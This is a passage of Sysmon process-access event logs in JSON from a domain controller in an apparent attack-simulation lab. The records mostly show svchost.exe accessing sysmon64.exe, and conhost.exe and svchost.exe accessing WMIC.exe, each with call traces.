ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001062D40800}\r\nTargetProcessId: 2788\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001062D40800}","TargetProcessId":"2788","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001062D40800}\r\nTargetProcessId: 2788\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001062D40800}","TargetProcessId":"2788","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
